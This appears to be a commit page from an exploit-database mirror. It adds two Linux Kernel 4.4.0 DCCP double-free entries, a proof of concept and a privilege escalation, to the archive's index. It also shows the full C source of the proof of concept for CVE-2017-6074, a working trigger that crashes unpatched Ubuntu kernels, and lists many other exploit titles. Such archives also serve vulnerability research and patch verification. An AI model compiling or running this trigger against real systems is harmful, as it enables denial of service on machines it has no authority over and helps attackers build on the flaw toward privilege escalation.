DB: 2017-02-27

2 new exploits Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
ababook · Feb 27, 2017 · 3f1035a · 3f1035a
1 parent 5d75646
commit 3f1035a
Show file tree

Hide file tree

Showing 3 changed files with 770 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -5383,6 +5383,7 @@ id,file,description,date,author,platform,type,port
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
+41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8818,6 +8819,7 @@ id,file,description,date,author,platform,type,port
 41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
+41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139

diff --git a/platforms/linux/dos/41457.c b/platforms/linux/dos/41457.c
@@ -0,0 +1,57 @@
+//
+// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
+//
+// A trigger for CVE-2017-6074, crashes kernel.
+// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
+//
+// Andrey Konovalov <[email protected]>
+
+#define _GNU_SOURCE
+
+#include <netinet/ip.h>
+
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <arpa/inet.h>
+
+int main() {
+	struct sockaddr_in6 sa1;
+	sa1.sin6_family = AF_INET6;
+	sa1.sin6_port = htons(20002);
+	inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
+	sa1.sin6_flowinfo = 0;
+	sa1.sin6_scope_id = 0;
+
+	int optval = 8;
+
+	int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
+	bind(s1, &sa1, 0x20);
+	listen(s1, 0x9);
+
+	setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);
+
+	int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
+	connect(s2, &sa1, 0x20);
+
+	shutdown(s1, SHUT_RDWR);
+	close(s1);
+	shutdown(s2, SHUT_RDWR);
+	close(s2);
+
+	return 0;
+}